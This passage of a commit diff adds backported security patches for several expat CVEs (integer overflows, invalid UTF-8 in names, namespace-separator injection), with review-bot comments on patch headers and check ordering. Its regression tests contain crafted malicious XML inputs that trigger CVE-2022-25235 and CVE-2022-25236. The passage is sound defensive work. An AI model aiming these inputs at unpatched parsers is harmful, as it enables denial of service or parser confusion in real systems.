+@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
+ }
+ } else {
+ DEFAULT_ATTRIBUTE *temp;
++
++ /* Detect and prevent integer overflow */
++ if (type->allocDefaultAtts > INT_MAX / 2) {
++ return 0;
++ }
++
+ int count = type->allocDefaultAtts * 2;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
++ return 0;
++ }
++#endif
++
+ temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
+ (count * sizeof(DEFAULT_ATTRIBUTE)));
+ if (temp == NULL)
+@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
+ /* check for overflow (table is half full) */
+ if (table->used >> (table->power - 1)) {
+ unsigned char newPower = table->power + 1;
++
++ /* Detect and prevent invalid shift */
++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
++ return NULL;
++ }
++
+ size_t newSize = (size_t)1 << newPower;
+ unsigned long newMask = (unsigned long)newSize - 1;
++
++ /* Detect and prevent integer overflow */
++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
++ return NULL;
++ }
++
+ size_t tsize = newSize * sizeof(NAMED *);
+ NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
+ if (! newV)
+@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
+ if (dtd->scaffCount >= dtd->scaffSize) {
+ CONTENT_SCAFFOLD *temp;
+ if (dtd->scaffold) {
++ /* Detect and prevent integer overflow */
++ if (dtd->scaffSize > UINT_MAX / 2u) {
++ return -1;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
++ return -1;
++ }
++#endif
++
+ temp = (CONTENT_SCAFFOLD *)REALLOC(
+ parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
+ if (temp == NULL)
+@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
+ XML_Content *ret;
+ XML_Content *cpos;
+ XML_Char *str;
+- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
+- + (dtd->contentStringLen * sizeof(XML_Char)));
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
++ return NULL;
++ }
++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
++ return NULL;
++ }
++#endif
++ if (dtd->scaffCount * sizeof(XML_Content)
++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
++ return NULL;
++ }
++
++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
++ + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ ret = (XML_Content *)MALLOC(parser, allocsize);
+ if (! ret)
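Review bot: In the second addBinding hunk of this patch, the two added overflow checks sit after `b = (BINDING *)MALLOC(parser, sizeof(BINDING));`, so returning `XML_ERROR_NO_MEMORY` from either of them leaves the freshly allocated `b` unreleased. Both checks depend only on `len`, so they can be placed before the allocation, i.e. `if (len > INT_MAX - EXPAND_SPARE) { return XML_ERROR_NO_MEMORY; }` and the `#if UINT_MAX >= SIZE_MAX` block first, then the `MALLOC` of `b`. Since this is a backport, the ordering presumably matches upstream, so it is worth raising there as well rather than only diverging locally. The body of addBinding, including the existing `if (! b->uri)` failure branch, continues outside the hunk.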
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23852.patch b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
new file mode 100644
index 0000000000..41425c108b
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
+From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 22 Jan 2022 17:48:00 +0100
+Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
+ (CVE-2022-23852)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
+
+CVE: CVE-2022-23852
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d54af683..5ce31402 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
+ keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
+ if (keep > XML_CONTEXT_BYTES)
+ keep = XML_CONTEXT_BYTES;
++ /* Detect and prevent integer overflow */
++ if (keep > INT_MAX - neededSize) {
++ parser->m_errorCode = XML_ERROR_NO_MEMORY;
++ return NULL;
++ }
+ neededSize += keep;
+ #endif /* defined XML_CONTEXT_BYTES */
+ if (neededSize
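Review bot: The patch header writes `Upstream-Status: Backport:` with a trailing colon and the URL on the next line, which is not the form the OE patch guidelines describe and may not be recognised by tooling that parses the tag. Writing it as `Upstream-Status: Backport [https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40]` keeps the origin of the fix machine-readable. The same header form appears in CVE-2021-46143.patch, CVE-2022-22822-27.patch and CVE-2022-23990.patch in this commit.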
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23990.patch b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
new file mode 100644
index 0000000000..c599517b3e
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
+From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 26 Jan 2022 02:36:43 +0100
+Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
+
+The change from "int nameLen" to "size_t nameLen"
+addresses the overflow on "nameLen++" in code
+"for (; name[nameLen++];)" right above the second
+change in the patch.
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
+
+CVE: CVE-2022-23990
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ lib/xmlparse.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 5ce31402..d1d17005 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (dtd->in_eldecl) {
+ ELEMENT_TYPE *el;
+ const XML_Char *name;
+- int nameLen;
++ size_t nameLen;
+ const char *nxt
+ = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
+ int myindex = nextScaffoldPart(parser);
+@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ nameLen = 0;
+ for (; name[nameLen++];)
+ ;
+- dtd->contentStringLen += nameLen;
++
++ /* Detect and prevent integer overflow */
++ if (nameLen > UINT_MAX - dtd->contentStringLen) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ dtd->contentStringLen += (unsigned)nameLen;
+ if (parser->m_elementDeclHandler)
+ handleDefault = XML_FALSE;
+ }
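Review bot: The file header of this patch is internally inconsistent: the `diff --git` line names `a/lib/xmlparse.c b/expat/lib/xmlparse.c`, while the `---`/`+++` lines both use `lib/xmlparse.c`. That looks like a hand-edited path prefix; it is harmless for tools that read only `---`/`+++`, but a git-based apply may reject it. I would make the line `diff --git a/lib/xmlparse.c b/lib/xmlparse.c` so the headers agree. CVE-2022-22822-27.patch and CVE-2022-23852.patch have a similar mismatch, with `expat/lib/xmlparse.c` on the `diff --git` line only.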
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
+From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 17:37:14 +0100
+Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/562/commits
+
+CVE: CVE-2022-25235
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmltok.c | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/lib/xmltok.c b/lib/xmltok.c
+index a72200e8..3bddf125 100644
+--- a/lib/xmltok.c
++++ b/lib/xmltok.c
+@@ -95,11 +95,6 @@
+ + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)] \
+ & (1u << (((byte)[2]) & 0x1F)))
+
+-#define UTF8_GET_NAMING(pages, p, n) \
+- ((n) == 2 \
+- ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p)) \
+- : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
+-
+ /* Detection of invalid UTF-8 sequences is based on Table 3.1B
+ of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
+ with the additional restriction of not allowing the Unicode
+From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:32:20 +0100
+Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/lib/xmltok_impl.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 0430591b4..64a3b2c15 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -61,7 +61,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NAME_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -90,7 +90,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
++ if (IS_INVALID_CHAR(enc, ptr, n)) { \
++ *nextTokPtr = ptr; \
++ return XML_TOK_INVALID; \
++ } \
+ if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ ptr += n; \
+ tok = XML_TOK_NAME; \
+From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 9 Feb 2022 01:00:38 +0100
+Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
+ already been validated
+
+---
+ expat/lib/xmltok_impl.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 64a3b2c1..84ff35f9 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
+ state = inName; \
+ }
+ # define LEAD_CASE(n) \
+- case BT_LEAD##n: \
++ case BT_LEAD##n: /* NOTE: The encoding has already been validated. */ \
+ START_NAME ptr += (n - MINBPC(enc)); \
+ break;
+ LEAD_CASE(2)
+@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:06:21 +0100
+Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 109 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index bc5344b1..9b155b82 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
+ }
+ END_TEST
+
++START_TEST(test_utf8_in_start_tags) {
++ struct test_case {
++ bool goodName;
++ bool goodNameStart;
++ const char *tagName;
++ };
++
++ // The idea with the tests below is this:
++ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
++ // go to isNever and are hence not a concern.
++ //
++ // We start with a character that is a valid name character
++ // (or even name-start character, see XML 1.0r4 spec) and then we flip
++ // single bits at places where (1) the result leaves the UTF-8 encoding space
++ // and (2) we stay in the same n-byte sequence family.
++ //
++ // The flipped bits are highlighted in angle brackets in comments,
++ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
++ // the most significant bit to 1 to leave UTF-8 encoding space.
++ struct test_case cases[] = {
++ // 1-byte UTF-8: [0xxx xxxx]
++ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
++ {false, false, "\xBA"}, // [<1>011 1010]
++ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
++ {false, false, "\xB9"}, // [<1>011 1001]
++
++ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
++ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
++ // Arabic small waw U+06E5
++ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
++ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
++ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
++ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
++ // combining char U+0301
++ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
++ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
++ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
++
++ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
++ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
++ // Devanagari Letter A U+0905
++ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
++ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
++ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
++ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
++ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
++ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
++ // combining char U+0901
++ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
++ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
++ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
++ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
++ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
++ };
++ const bool atNameStart[] = {true, false};
++
++ size_t i = 0;
++ char doc[1024];
++ size_t failCount = 0;
++
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ size_t j = 0;
++ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
++ const bool expectedSuccess
++ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
++ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
++ XML_Parser parser = XML_ParserCreate(NULL);
++
++ const enum XML_Status status
++ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
++
++ bool success = true;
++ if ((status == XML_STATUS_OK) != expectedSuccess) {
++ success = false;
++ }
++ if ((status == XML_STATUS_ERROR)
++ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
++ success = false;
++ }
++
++ if (! success) {
++ fprintf(
++ stderr,
++ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
++ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
++ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
++ failCount++;
++ }
++
++ XML_ParserFree(parser);
++ }
++ }
++
++ if (failCount > 0) {
++ fail("UTF-8 regression detected");
++ }
++}
++END_TEST
++
+ /* Test trailing spaces in elements are accepted */
+ static void XMLCALL
+ record_element_end_handler(void *userData, const XML_Char *name) {
+@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
+ }
+ END_TEST
+
++START_TEST(test_bad_doctype_utf8) {
++ const char *text = "<!DOCTYPE \xDB\x25"
++ "doc><doc/>"; // [1101 1011] [<0>010 0101]
++ expect_failure(text, XML_ERROR_INVALID_TOKEN,
++ "Invalid UTF-8 in DOCTYPE not faulted");
++}
++END_TEST
++
+ START_TEST(test_bad_doctype_utf16) {
+ const char text[] =
+ /* <!DOCTYPE doc [ \x06f2 ]><doc/>
+@@ -11870,6 +11977,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
++ tcase_add_test(tc_basic, test_utf8_in_start_tags);
+ tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
+ tcase_add_test(tc_basic, test_utf16_attribute);
+ tcase_add_test(tc_basic, test_utf16_second_attr);
+@@ -11878,6 +11986,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype);
++ tcase_add_test(tc_basic, test_bad_doctype_utf8);
+ tcase_add_test(tc_basic, test_bad_doctype_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype_plus);
+ tcase_add_test(tc_basic, test_bad_doctype_star);
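Review bot: The `Upstream-Status` line points at `https://github.com/libexpat/libexpat/pull/562/commits`, a pull-request listing, while the file concatenates four upstream commits (ee2a5b50, 3f0a0cb6, c85a3025, 6a5510bc) of which only the first carries the `Upstream-Status`, `CVE` and `Signed-off-by` tags. A pull-request page can change after the fact, so for auditability I would reference the commits themselves, e.g. `Upstream-Status: Backport [<upstream commit URLs for the four hashes above>]`. CVE-2022-25236.patch in this commit has the same shape with `pull/561/commits`.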
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
+From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:19:13 +0100
+Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/561/commits
+
+CVE: CVE-2022-25236
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 902895d5..c768f856 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
+
+ XML_Parser XMLCALL
+ XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
+- XML_Char tmp[2];
+- *tmp = nsSep;
++ XML_Char tmp[2] = {nsSep, 0};
+ return XML_ParserCreate_MM(encodingName, NULL, tmp);
+ }
+
+@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
+ would be otherwise.
+ */
+ if (parser->m_ns) {
+- XML_Char tmp[2];
+- *tmp = parser->m_namespaceSeparator;
++ XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
+ parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
+ } else {
+ parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
+From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 01:09:29 +0100
+Subject: [PATCH] lib: Protect against malicious namespace declarations
+ (CVE-2022-25236)
+
+---
+ expat/lib/xmlparse.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c768f856..a3aef88c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (! mustBeXML && isXMLNS
+ && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
+ isXMLNS = XML_FALSE;
++
++ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
++ // we have to at least make sure that the XML processor on top of
++ // Expat (that is splitting tag names by namespace separator into
++ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
++ // by an attacker putting additional namespace separator characters
++ // into namespace declarations. That would be ambiguous and not to
++ // be expected.
++ if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator)) {
++ return XML_ERROR_SYNTAX;
++ }
+ }
+ isXML = isXML && len == xmlLen;
+ isXMLNS = isXMLNS && len == xmlnsLen;
+From 2de077423fb22750ebea599677d523b53cb93b1d Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:51:43 +0100
+Subject: [PATCH] tests: Cover CVE-2022-25236
+
+---
+ expat/tests/runtests.c | 30 ++++++++++++++++++++++++++++++
+ 1 file changed, 30 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index d07203f2..bc5344b1 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -7220,6 +7220,35 @@ START_TEST(test_ns_double_colon_doctype) {
+ }
+ END_TEST
+
++START_TEST(test_ns_separator_in_uri) {
++ struct test_case {
++ enum XML_Status expectedStatus;
++ const char *doc;
++ };
++ struct test_case cases[] = {
++ {XML_STATUS_OK, "<doc xmlns='one_two' />"},
++ {XML_STATUS_ERROR, "<doc xmlns='one&#x0A;two' />"},
++ };
++
++ size_t i = 0;
++ size_t failCount = 0;
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ XML_Parser parser = XML_ParserCreateNS(NULL, '\n');
++ XML_SetElementHandler(parser, dummy_start_element, dummy_end_element);
++ if (XML_Parse(parser, cases[i].doc, (int)strlen(cases[i].doc),
++ /*isFinal*/ XML_TRUE)
++ != cases[i].expectedStatus) {
++ failCount++;
++ }
++ XML_ParserFree(parser);
++ }
++
++ if (failCount) {
++ fail("Namespace separator handling is broken");
++ }
++}
++END_TEST
++
+ /* Control variable; the number of times duff_allocator() will successfully
+ * allocate */
+ #define ALLOC_ALWAYS_SUCCEED (-1)
+@@ -11905,6 +11934,7 @@ make_suite(void) {
+ tcase_add_test(tc_namespace, test_ns_utf16_doctype);
+ tcase_add_test(tc_namespace, test_ns_invalid_doctype);
+ tcase_add_test(tc_namespace, test_ns_double_colon_doctype);
++ tcase_add_test(tc_namespace, test_ns_separator_in_uri);
+
+ suite_add_tcase(s, tc_misc);
+ tcase_add_checked_fixture(tc_misc, NULL, basic_teardown);
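Review bot: The added check in addBinding, `if (parser->m_ns && (uri[len] == parser->m_namespaceSeparator))`, rejects every namespace URI that contains the separator character, whatever separator the application chose. For an application that created its parser with a separator that is also a legal URI character, documents that parsed before would now fail with `XML_ERROR_SYNTAX`, and the new test only exercises the `'\n'` separator. I believe upstream relaxed this check in a later release for characters that are valid in URIs; it would be worth confirming whether that follow-up is part of this series. If it is not, the patch header should record the behaviour change, e.g. `Note: namespace URIs containing the separator character are now rejected.` The loop enclosing the check starts outside the hunk.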
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
new file mode 100644
index 0000000000..af255e8cb5
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch
@@ -0,0 +1,131 @@
+From b12f34fe32821a69dc12ff9a021daca0856de238 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 19 Feb 2022 23:59:25 +0000
+Subject: [PATCH] Fix build_model regression.
+
+The iterative approach in build_model failed to fill children arrays
+correctly. A preorder traversal is not required and turned out to be the
+culprit. Use an easier algorithm:
+
+Add nodes from scaffold tree starting at index 0 (root) to the target
+array whenever children are encountered. This ensures that children
+are adjacent to each other. This complies with the recursive version.
+
+Store only the scaffold index in numchildren field to prevent a direct
+processing of these children, which would require a recursive solution.
+This allows the algorithm to iterate through the target array from start
+to end without jumping back and forth, converting on the fly.
+
+Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
+---
+ lib/xmlparse.c | 79 ++++++++++++++++++++++++++------------------
+ 1 file changed, 47 insertions(+), 32 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c479a258..84885b5a 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -7373,39 +7373,58 @@ build_model(XML_Parser parser) {
+ *
+ * The iterative approach works as follows:
+ *
+- * - We use space in the target array for building a temporary stack structure
+- * while that space is still unused.
+- * The stack grows from the array's end downwards and the "actual data"
+- * grows from the start upwards, sequentially.
+- * (Because stack grows downwards, pushing onto the stack is a decrement
+- * while popping off the stack is an increment.)
++ * - We have two writing pointers, both walking up the result array; one does
++ * the work, the other creates "jobs" for its colleague to do, and leads
++ * the way:
+ *
+- * - A stack element appears as a regular XML_Content node on the outside,
+- * but only uses a single field -- numchildren -- to store the source
+- * tree node array index. These are the breadcrumbs leading the way back
+- * during pre-order (node first) depth-first traversal.
++ * - The faster one, pointer jobDest, always leads and writes "what job
++ * to do" by the other, once they reach that place in the
++ * array: leader "jobDest" stores the source node array index (relative
++ * to array dtd->scaffold) in field "numchildren".
+ *
+- * - The reason we know the stack will never grow into (or overlap with)
+- * the area with data of value at the start of the array is because
+- * the overall number of elements to process matches the size of the array,
+- * and the sum of fully processed nodes and yet-to-be processed nodes
+- * on the stack, cannot be more than the total number of nodes.
+- * It is possible for the top of the stack and the about-to-write node
+- * to meet, but that is safe because we get the source index out
+- * before doing any writes on that node.
++ * - The slower one, pointer dest, looks at the value stored in the
++ * "numchildren" field (which actually holds a source node array index
++ * at that time) and puts the real data from dtd->scaffold in.
++ *
